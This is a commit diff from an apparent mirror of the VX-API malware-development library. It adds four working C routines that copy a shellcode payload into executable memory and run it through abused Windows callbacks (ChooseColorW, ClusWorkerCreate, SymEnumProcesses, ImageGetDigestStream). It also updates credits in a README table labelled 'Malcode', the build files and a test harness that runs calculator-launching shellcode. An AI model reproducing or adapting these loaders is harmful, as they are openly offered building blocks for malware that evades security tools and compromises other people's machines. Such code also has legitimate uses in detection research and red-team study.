mirror of https://github.com/vxunderground/VX-API
parent
e071f6603f
commit
83099c6721
58
README.md
58
README.md
|
@ -173,33 +173,37 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| MpfGetLsaPidFromServiceManager | modexp | Malcode |
|
||||
| MpfGetLsaPidFromRegistry | modexp | Malcode |
|
||||
| MpfGetLsaPidFromNamedPipe | modexp | Malcode |
|
||||
| MpfSceViaEnumChildWindows | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaCDefFolderMenu_Create2 | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaCertEnumSystemStore | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaCertEnumSystemStoreLocation | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDateFormatsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDesktopWindows | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDesktopsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDirTreeW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumDisplayMonitors | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumFontFamiliesExW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumFontsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumLanguageGroupLocalesW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumObjects | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumResourceTypesExW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumSystemCodePagesW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumSystemGeoID | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumSystemLanguageGroupsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumSystemLocalesEx | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumThreadWindows | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumTimeFormatsEx | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumUILanguagesW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumWindowStationsW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumWindows | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumerateLoadedModules64 | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaK32EnumPageFilesW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumPwrSchemes | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaMessageBoxIndirectW | alfarom256, aahmad097 | Malcode |
|
||||
| MpfSceViaEnumChildWindows | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaCDefFolderMenu_Create2 | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaCertEnumSystemStore | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaCertEnumSystemStoreLocation | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumDateFormatsW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumDesktopWindows | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumDesktopsW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumDirTreeW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumDisplayMonitors | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumFontFamiliesExW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumFontsW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumLanguageGroupLocalesW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumObjects | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumResourceTypesExW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumSystemCodePagesW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumSystemGeoID | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumSystemLanguageGroupsW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumSystemLocalesEx | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumThreadWindows | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumTimeFormatsEx | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumUILanguagesW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumWindowStationsW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumWindows | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumerateLoadedModules64 | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaK32EnumPageFilesW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaEnumPwrSchemes | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaMessageBoxIndirectW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaChooseColorW | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaClusWorkerCreate | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaSymEnumProcesses | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfSceViaImageGetDigestStream | alfarom256, aahmad097, wra7h | Malcode |
|
||||
| MpfComMonitorChromeSessionOnce | smelly__vx | Malcode |
|
||||
| MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 | Malcode |
|
||||
| MpfLolExecuteRemoteBinaryByAppInstaller | Wade Hickey | Malcode |
|
||||
|
|
|
@ -2,23 +2,20 @@
|
|||
|
||||
INT main(VOID)
|
||||
{
|
||||
PCHAR Buffer = NULL;
|
||||
/*
|
||||
|
||||
This is stuff I was debugging.
|
||||
------------------------------------
|
||||
|
||||
DWORD dwSize = 0;
|
||||
HMODULE hMod = NULL;
|
||||
BYTE CompressedBuffer[512] = { 0 };
|
||||
ULONG Size = 512;
|
||||
ULONG Out = 0;
|
||||
PCHAR Buffer = GenericShellcodeOpenCalcExitThread(&dwSize);
|
||||
|
||||
BYTE DecompressedBuffer[512] = { 0 };
|
||||
MpfSceViaImageGetDigestStream((PBYTE)Buffer, dwSize);
|
||||
|
||||
------------------------------------
|
||||
*/
|
||||
|
||||
Buffer = GenericShellcodeOpenCalcExitThread(&dwSize);
|
||||
|
||||
Out = LzStandardCompressBuffer((PBYTE)Buffer, dwSize, CompressedBuffer, Size);
|
||||
|
||||
Out = LzStandardDecompressBuffer(CompressedBuffer, Out, DecompressedBuffer, Size);
|
||||
|
||||
if (Buffer)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, Buffer);
|
||||
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeChooseColorWCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
CHOOSECOLORW Color = { 0 };
|
||||
Color.lStructSize = sizeof(CHOOSECOLORW);
|
||||
Color.Flags = CC_ENABLEHOOK;
|
||||
Color.lpfnHook = (LPCCHOOKPROC)lpParameter;
|
||||
|
||||
ChooseColorW(&Color);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaChooseColorW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeChooseColorWCallbackRoutine, BinAddress, INFINITE);
|
||||
}
|
|
@ -0,0 +1,27 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeClusWorkerCreateCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
CLUS_WORKER Worker = { 0 };
|
||||
|
||||
if (ClusWorkerCreate(&Worker, (PWORKER_START_ROUTINE)lpParameter, NULL) == ERROR_SUCCESS)
|
||||
{
|
||||
ClusWorkerTerminateEx(&Worker, INFINITE, TRUE);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
BOOL MpfSceViaClusWorkerCreate(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeClusWorkerCreateCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,37 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
|
||||
|
||||
VOID InvokeImageGetDigestStreamCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
WCHAR DefaultBinaryPath[MAX_PATH * sizeof(WCHAR)] = L"C:\\Windows\\System32\\ntdll.dll";
|
||||
HANDLE hImage = NULL;
|
||||
HANDLE hDispose = NULL;
|
||||
|
||||
hImage = CreateFileW(DefaultBinaryPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
|
||||
if (hImage == INVALID_HANDLE_VALUE)
|
||||
return;
|
||||
|
||||
ImageGetDigestStream(hImage, CERT_PE_IMAGE_DIGEST_ALL_IMPORT_INFO, (DIGEST_FUNCTION)lpParameter, &hDispose);
|
||||
|
||||
if(hDispose)
|
||||
CloseHandle(hDispose);
|
||||
|
||||
if(hImage)
|
||||
CloseHandle(hImage);
|
||||
}
|
||||
|
||||
BOOL MpfSceViaImageGetDigestStream(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeImageGetDigestStreamCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,30 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
VOID InvokeSymEnumProcessesCallbackRoutine(LPVOID lpParameter)
|
||||
{
|
||||
if (!SymInitializeW(GetCurrentProcess(), NULL, FALSE))
|
||||
return;
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 6387)
|
||||
SymEnumProcesses((PSYM_ENUMPROCESSES_CALLBACK)lpParameter, NULL);
|
||||
#pragma warning( pop )
|
||||
|
||||
SymCleanup(GetCurrentProcess());
|
||||
|
||||
}
|
||||
|
||||
BOOL MpfSceViaSymEnumProcesses(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)
|
||||
{
|
||||
LPVOID BinAddress = NULL;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, PayloadSizeInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
return FALSE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Payload, PayloadSizeInBytes);
|
||||
|
||||
CreateThreadAndWaitForCompletion((LPTHREAD_START_ROUTINE)InvokeSymEnumProcessesCallbackRoutine, BinAddress, INFINITE);
|
||||
|
||||
return TRUE;
|
||||
}
|
|
@ -266,6 +266,8 @@
|
|||
<ClCompile Include="MpfSceViaCertEnumSystemStore.cpp" />
|
||||
<ClCompile Include="MpfSceViaCertEnumSystemStoreLocation.cpp" />
|
||||
<ClCompile Include="MpfSceViaCertFindChainInStore.cpp" />
|
||||
<ClCompile Include="MpfSceViaChooseColor.cpp" />
|
||||
<ClCompile Include="MpfSceViaClusWorkerCreate.cpp" />
|
||||
<ClCompile Include="MpfSceViaCreateThreadpoolWait.cpp" />
|
||||
<ClCompile Include="MpfSceViaCreateTimerQueueTimer.cpp" />
|
||||
<ClCompile Include="MpfSceViaCryptEnumOIDInfo.cpp" />
|
||||
|
@ -295,10 +297,12 @@
|
|||
<ClCompile Include="MpfSceViaEnumWindowStationsW.cpp" />
|
||||
<ClCompile Include="MpfSceViaEvtSubscribe.cpp" />
|
||||
<ClCompile Include="MpfSceViaFlsAlloc.cpp" />
|
||||
<ClCompile Include="MpfSceViaImageGetDigestStream.cpp" />
|
||||
<ClCompile Include="MpfSceViaImmEnumInputContext.cpp" />
|
||||
<ClCompile Include="MpfSceViaInitOnceExecuteOnce.cpp" />
|
||||
<ClCompile Include="MpfSceViaK32EnumPageFilesW.cpp" />
|
||||
<ClCompile Include="MpfSceViaMessageBoxIndirectW.cpp" />
|
||||
<ClCompile Include="MpfSceViaSymEnumProcesses.cpp" />
|
||||
<ClCompile Include="ProxyRegisterWaitLoadLibrary.cpp" />
|
||||
<ClCompile Include="ProxyWorkItemLoadLibrary.cpp" />
|
||||
<ClCompile Include="ReadDataFromPeSection.cpp" />
|
||||
|
|
|
@ -741,6 +741,18 @@
|
|||
<ClCompile Include="XpressHuffMaximumDecompressBuffer.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Cryptography Related\Compression\Xpress Huff</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaChooseColor.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaClusWorkerCreate.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaSymEnumProcesses.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfSceViaImageGetDigestStream.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -3,7 +3,8 @@
|
|||
#include "StringManipulation.h"
|
||||
#include "FunctionDeclaration.h"
|
||||
#include <Ws2tcpip.h>
|
||||
#include <Dbghelp.h>
|
||||
#include <imagehlp.h>
|
||||
//#include <Dbghelp.h>
|
||||
#include <wincrypt.h>
|
||||
#include <shlwapi.h>
|
||||
#include <Shlobj.h>
|
||||
|
@ -19,12 +20,15 @@
|
|||
#include <imm.h>
|
||||
#include <dpa_dsa.h>
|
||||
#include <winevt.h>
|
||||
#include <resapi.h>
|
||||
|
||||
|
||||
|
||||
#pragma comment(lib, "Dnsapi.lib")
|
||||
#pragma comment(lib, "Iphlpapi.lib")
|
||||
#pragma comment(lib, "Crypt32.lib")
|
||||
#pragma comment(lib, "Dbghelp.lib")
|
||||
#pragma comment(lib, "Imagehlp.lib")
|
||||
//#pragma comment(lib, "Dbghelp.lib")
|
||||
#pragma comment(lib, "Wtsapi32.lib")
|
||||
#pragma comment(lib, "Urlmon.lib")
|
||||
#pragma comment(lib, "PowrProf.lib")
|
||||
|
@ -32,6 +36,8 @@
|
|||
#pragma comment(lib, "Imm32.lib")
|
||||
#pragma comment(lib, "Comctl32.lib")
|
||||
#pragma comment(lib, "Wevtapi.lib")
|
||||
#pragma comment(lib, "ResUtils.lib")
|
||||
|
||||
|
||||
|
||||
#ifndef NT_SUCCESS
|
||||
|
@ -312,6 +318,11 @@ BOOL MpfSceViaCreateTimerQueueTimer(_In_ PBYTE Payload, _In_ DWORD PayloadSizeIn
|
|||
BOOL MpfSceViaEvtSubscribe(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes); //Unstable, some shellcode crashes application, requires improved testing
|
||||
BOOL MpfSceViaFlsAlloc(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaInitOnceExecuteOnce(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaChooseColorW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaClusWorkerCreate(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaSymEnumProcesses(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
BOOL MpfSceViaImageGetDigestStream(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes);
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue